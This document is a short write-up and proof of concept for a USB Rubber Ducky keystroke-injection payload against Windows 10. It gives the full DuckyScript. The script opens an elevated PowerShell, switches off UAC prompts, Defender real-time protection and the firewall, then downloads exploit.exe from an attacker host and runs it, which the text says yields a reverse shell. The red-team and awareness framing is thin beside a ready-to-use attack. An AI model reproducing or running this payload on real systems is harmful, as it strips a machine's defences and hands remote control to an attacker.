In the name of Allah, the Most Gracious, the Most Merciful.
Description: A simple Rubber Duck Payload to disabling Windows UAC, Windows Firewall, and Windows Defender.
This PoC show how to Automate Turn Off the Windows UAC, Windows Firewall, and Windows Defender at Windows 10 and also connect to Attacker Machine via Reverse Shell within (or less than) 10 seconds with USB HID Attack.
In this payload, we also add a function to download a file from server and executing it automatically. As a note, at the PoC Video, the file was a reverse shell that will be connect into the Attacker machine when executed at the victim OS.
Generally, this script also could help to conduct the Security Awareness at the end-user or conduct one of the red-team scenario.
PoC Script: https://github.com/yokokho/another-rubber-duck-payloads/blob/master/payload/Turn-Off-UAC-ETC.md
The Payload:
The payload are not the original one since we combine one payload with another payload.
Please kindly note, this payload was executed within 10 seconds. Logically, it could be modify to less than 10 seconds since we put the delay around 1000 – 1500 ms.
REM Automate Turn-Off - Windows UAC, Windows Firewall, and Windows Defender
REM Also automate to Download the malware and connect with Reverse Shell
GUI r
DELAY 1000
REM Open the Powershell as Administrator
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1500
ALT y
ENTER
DELAY 1000
REM Disabling the UAC
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ENTER
DELAY 1000
REM Disabling the Firewall Part 1
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
REM Disabling the Firewall Part 2
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
ENTER
DELAY 1000
REM Disabling the Virus and Threat Protection
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
ENTER
DELAY 1000
REM Moving into C Directory
STRING cd C:\
ENTER
REM Download the Prepared Malware
STRING $WC = New-Object System.Net.WebClient
ENTER
STRING $WC.DownloadFile("http://192.168.13.129/exploit.exe","C:\exploit.exe")
ENTER
DELAY 500
REM Execute the Downloaded Malware
STRING .\exploit.exe
ENTER
DELAY 1000
ENTER
STRING exit
ENTERAdditional Note:
- It can be setup in less than 10 second (depends to the DELAY time at the script).
- This script was uploaded into one of Arduino Board Series.
References:
